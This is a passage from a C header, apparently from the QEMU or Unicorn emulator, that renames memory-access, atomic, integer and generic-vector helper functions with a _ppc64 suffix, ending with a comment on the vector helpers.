cpu_ldsw_mmuidx_ra_ppc64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_ppc64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_ppc64 #define cpu_ldub_data_ra cpu_ldub_data_ra_ppc64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_ppc64 
#define cpu_lduw_data_ra cpu_lduw_data_ra_ppc64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_ppc64 #define cpu_ldl_data_ra cpu_ldl_data_ra_ppc64 #define cpu_ldq_data_ra cpu_ldq_data_ra_ppc64 #define cpu_ldub_data cpu_ldub_data_ppc64 #define cpu_ldsb_data cpu_ldsb_data_ppc64 #define cpu_lduw_data cpu_lduw_data_ppc64 #define cpu_ldsw_data cpu_ldsw_data_ppc64 #define cpu_ldl_data cpu_ldl_data_ppc64 #define cpu_ldq_data cpu_ldq_data_ppc64 #define helper_ret_stb_mmu helper_ret_stb_mmu_ppc64 #define helper_le_stw_mmu helper_le_stw_mmu_ppc64 #define helper_be_stw_mmu helper_be_stw_mmu_ppc64 #define helper_le_stl_mmu helper_le_stl_mmu_ppc64 #define helper_be_stl_mmu helper_be_stl_mmu_ppc64 #define helper_le_stq_mmu helper_le_stq_mmu_ppc64 #define helper_be_stq_mmu helper_be_stq_mmu_ppc64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_ppc64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_ppc64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_ppc64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_ppc64 #define cpu_stb_data_ra cpu_stb_data_ra_ppc64 #define cpu_stw_data_ra cpu_stw_data_ra_ppc64 #define cpu_stl_data_ra cpu_stl_data_ra_ppc64 #define cpu_stq_data_ra cpu_stq_data_ra_ppc64 #define cpu_stb_data cpu_stb_data_ppc64 #define cpu_stw_data cpu_stw_data_ppc64 #define cpu_stl_data cpu_stl_data_ppc64 #define cpu_stq_data cpu_stq_data_ppc64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_ppc64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_ppc64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_ppc64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_ppc64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_ppc64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_ppc64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_ppc64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_ppc64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_ppc64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_ppc64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_ppc64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_ppc64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_ppc64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_ppc64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_ppc64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_ppc64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_ppc64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_ppc64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_ppc64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_ppc64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_ppc64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_ppc64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_ppc64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_ppc64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_ppc64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_ppc64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_ppc64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_ppc64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_ppc64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_ppc64 
#define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_ppc64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_ppc64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_ppc64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_ppc64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_ppc64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_ppc64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_ppc64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_ppc64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_ppc64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_ppc64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_ppc64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_ppc64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_ppc64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_ppc64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_ppc64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_ppc64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_ppc64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_ppc64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_ppc64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_ppc64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_ppc64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_ppc64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_ppc64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_ppc64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_ppc64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_ppc64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_ppc64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_ppc64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_ppc64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_ppc64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_ppc64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_ppc64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_ppc64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_ppc64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_ppc64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_ppc64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_ppc64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_ppc64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_ppc64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_ppc64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_ppc64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_ppc64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_ppc64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_ppc64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_ppc64 #define helper_atomic_fetch_orl_be_mmu 
helper_atomic_fetch_orl_be_mmu_ppc64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_ppc64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_ppc64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_ppc64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_ppc64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_ppc64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_ppc64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_ppc64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_ppc64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_ppc64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_ppc64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_ppc64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_ppc64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_ppc64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_ppc64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_ppc64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_ppc64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_ppc64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_ppc64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_ppc64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_ppc64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_ppc64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_ppc64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_ppc64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_ppc64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_ppc64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_ppc64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_ppc64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_ppc64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_ppc64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_ppc64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_ppc64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_ppc64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_ppc64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_ppc64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_ppc64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_ppc64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_ppc64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_ppc64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_ppc64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_ppc64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_ppc64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_ppc64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_ppc64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_ppc64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_ppc64 
#define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_ppc64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_ppc64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_ppc64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_ppc64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_ppc64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_ppc64 #define helper_atomic_xchgb helper_atomic_xchgb_ppc64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_ppc64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_ppc64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_ppc64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_ppc64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_ppc64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_ppc64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_ppc64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_ppc64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_ppc64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_ppc64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_ppc64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_ppc64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_ppc64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_ppc64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_ppc64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_ppc64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_ppc64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_ppc64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_ppc64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_ppc64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_ppc64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_ppc64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_ppc64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_ppc64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_ppc64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_ppc64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_ppc64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_ppc64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_ppc64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_ppc64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_ppc64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_ppc64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_ppc64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_ppc64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_ppc64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_ppc64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_ppc64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_ppc64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_ppc64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_ppc64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_ppc64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_ppc64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_ppc64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_ppc64 #define helper_atomic_fetch_smaxw_be 
helper_atomic_fetch_smaxw_be_ppc64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_ppc64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_ppc64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_ppc64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_ppc64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_ppc64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_ppc64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_ppc64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_ppc64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_ppc64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_ppc64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_ppc64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_ppc64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_ppc64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_ppc64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_ppc64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_ppc64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_ppc64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_ppc64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_ppc64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_ppc64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_ppc64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_ppc64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_ppc64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_ppc64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_ppc64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_ppc64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_ppc64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_ppc64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_ppc64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_ppc64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_ppc64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_ppc64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_ppc64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_ppc64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_ppc64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_ppc64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_ppc64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_ppc64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_ppc64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_ppc64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_ppc64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_ppc64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_ppc64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_ppc64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_ppc64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_ppc64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_ppc64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_ppc64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_ppc64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_ppc64 #define 
helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_ppc64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_ppc64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_ppc64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_ppc64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_ppc64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_ppc64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_ppc64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_ppc64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_ppc64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_ppc64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_ppc64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_ppc64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_ppc64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_ppc64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_ppc64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_ppc64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_ppc64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_ppc64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_ppc64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_ppc64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_ppc64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_ppc64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_ppc64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_ppc64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_ppc64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_ppc64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_ppc64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_ppc64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_ppc64 #define cpu_ldub_code cpu_ldub_code_ppc64 #define cpu_lduw_code cpu_lduw_code_ppc64 #define cpu_ldl_code cpu_ldl_code_ppc64 #define cpu_ldq_code cpu_ldq_code_ppc64 #define helper_div_i32 helper_div_i32_ppc64 #define helper_rem_i32 helper_rem_i32_ppc64 #define helper_divu_i32 helper_divu_i32_ppc64 #define helper_remu_i32 helper_remu_i32_ppc64 #define helper_shl_i64 helper_shl_i64_ppc64 #define helper_shr_i64 helper_shr_i64_ppc64 #define helper_sar_i64 helper_sar_i64_ppc64 #define helper_div_i64 helper_div_i64_ppc64 #define helper_rem_i64 helper_rem_i64_ppc64 #define helper_divu_i64 helper_divu_i64_ppc64 #define helper_remu_i64 helper_remu_i64_ppc64 #define helper_muluh_i64 helper_muluh_i64_ppc64 #define helper_mulsh_i64 helper_mulsh_i64_ppc64 #define helper_clz_i32 helper_clz_i32_ppc64 #define helper_ctz_i32 helper_ctz_i32_ppc64 #define helper_clz_i64 helper_clz_i64_ppc64 #define helper_ctz_i64 helper_ctz_i64_ppc64 #define helper_clrsb_i32 helper_clrsb_i32_ppc64 #define helper_clrsb_i64 helper_clrsb_i64_ppc64 #define helper_ctpop_i32 helper_ctpop_i32_ppc64 #define helper_ctpop_i64 helper_ctpop_i64_ppc64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_ppc64 #define helper_exit_atomic helper_exit_atomic_ppc64 #define helper_gvec_add8 helper_gvec_add8_ppc64 #define helper_gvec_add16 helper_gvec_add16_ppc64 #define helper_gvec_add32 helper_gvec_add32_ppc64 #define helper_gvec_add64 helper_gvec_add64_ppc64 #define helper_gvec_adds8 helper_gvec_adds8_ppc64 #define helper_gvec_adds16 
helper_gvec_adds16_ppc64 #define helper_gvec_adds32 helper_gvec_adds32_ppc64 #define helper_gvec_adds64 helper_gvec_adds64_ppc64 #define helper_gvec_sub8 helper_gvec_sub8_ppc64 #define helper_gvec_sub16 helper_gvec_sub16_ppc64 #define helper_gvec_sub32 helper_gvec_sub32_ppc64 #define helper_gvec_sub64 helper_gvec_sub64_ppc64 #define helper_gvec_subs8 helper_gvec_subs8_ppc64 #define helper_gvec_subs16 helper_gvec_subs16_ppc64 #define helper_gvec_subs32 helper_gvec_subs32_ppc64 #define helper_gvec_subs64 helper_gvec_subs64_ppc64 #define helper_gvec_mul8 helper_gvec_mul8_ppc64 #define helper_gvec_mul16 helper_gvec_mul16_ppc64 #define helper_gvec_mul32 helper_gvec_mul32_ppc64 #define helper_gvec_mul64 helper_gvec_mul64_ppc64 #define helper_gvec_muls8 helper_gvec_muls8_ppc64 #define helper_gvec_muls16 helper_gvec_muls16_ppc64 #define helper_gvec_muls32 helper_gvec_muls32_ppc64 #define helper_gvec_muls64 helper_gvec_muls64_ppc64 #define helper_gvec_neg8 helper_gvec_neg8_ppc64 #define helper_gvec_neg16 helper_gvec_neg16_ppc64 #define helper_gvec_neg32 helper_gvec_neg32_ppc64 #define helper_gvec_neg64 helper_gvec_neg64_ppc64 #define helper_gvec_abs8 helper_gvec_abs8_ppc64 #define helper_gvec_abs16 helper_gvec_abs16_ppc64 #define helper_gvec_abs32 helper_gvec_abs32_ppc64 #define helper_gvec_abs64 helper_gvec_abs64_ppc64 #define helper_gvec_mov helper_gvec_mov_ppc64 #define helper_gvec_dup64 helper_gvec_dup64_ppc64 #define helper_gvec_dup32 helper_gvec_dup32_ppc64 #define helper_gvec_dup16 helper_gvec_dup16_ppc64 #define helper_gvec_dup8 helper_gvec_dup8_ppc64 #define helper_gvec_not helper_gvec_not_ppc64 #define helper_gvec_and helper_gvec_and_ppc64 #define helper_gvec_or helper_gvec_or_ppc64 #define helper_gvec_xor helper_gvec_xor_ppc64 #define helper_gvec_andc helper_gvec_andc_ppc64 #define helper_gvec_orc helper_gvec_orc_ppc64 #define helper_gvec_nand helper_gvec_nand_ppc64 #define helper_gvec_nor helper_gvec_nor_ppc64 #define helper_gvec_eqv helper_gvec_eqv_ppc64 #define helper_gvec_ands helper_gvec_ands_ppc64 #define helper_gvec_xors helper_gvec_xors_ppc64 #define helper_gvec_ors helper_gvec_ors_ppc64 #define helper_gvec_shl8i helper_gvec_shl8i_ppc64 #define helper_gvec_shl16i helper_gvec_shl16i_ppc64 #define helper_gvec_shl32i helper_gvec_shl32i_ppc64 #define helper_gvec_shl64i helper_gvec_shl64i_ppc64 #define helper_gvec_shr8i helper_gvec_shr8i_ppc64 #define helper_gvec_shr16i helper_gvec_shr16i_ppc64 #define helper_gvec_shr32i helper_gvec_shr32i_ppc64 #define helper_gvec_shr64i helper_gvec_shr64i_ppc64 #define helper_gvec_sar8i helper_gvec_sar8i_ppc64 #define helper_gvec_sar16i helper_gvec_sar16i_ppc64 #define helper_gvec_sar32i helper_gvec_sar32i_ppc64 #define helper_gvec_sar64i helper_gvec_sar64i_ppc64 #define helper_gvec_shl8v helper_gvec_shl8v_ppc64 #define helper_gvec_shl16v helper_gvec_shl16v_ppc64 #define helper_gvec_shl32v helper_gvec_shl32v_ppc64 #define helper_gvec_shl64v helper_gvec_shl64v_ppc64 #define helper_gvec_shr8v helper_gvec_shr8v_ppc64 #define helper_gvec_shr16v helper_gvec_shr16v_ppc64 #define helper_gvec_shr32v helper_gvec_shr32v_ppc64 #define helper_gvec_shr64v helper_gvec_shr64v_ppc64 #define helper_gvec_sar8v helper_gvec_sar8v_ppc64 #define helper_gvec_sar16v helper_gvec_sar16v_ppc64 #define helper_gvec_sar32v helper_gvec_sar32v_ppc64 #define helper_gvec_sar64v helper_gvec_sar64v_ppc64 #define helper_gvec_eq8 helper_gvec_eq8_ppc64 #define helper_gvec_ne8 helper_gvec_ne8_ppc64 #define helper_gvec_lt8 helper_gvec_lt8_ppc64 #define helper_gvec_le8 helper_gvec_le8_ppc64 
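/*
 * helper_gvec_* are QEMU's generic-vector (gvec) helpers: out-of-line
 * expansions that loop over a guest vector in host-integer-sized chunks
 * when an operation is not emitted inline. The numeric suffix is the
 * element width in bits; an "s" variant (adds, subs, muls, ands, ...)
 * takes a scalar second operand, and the shift helpers come in immediate
 * (shl8i, ...) and per-element vector (shl8v, ...) forms.
 */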
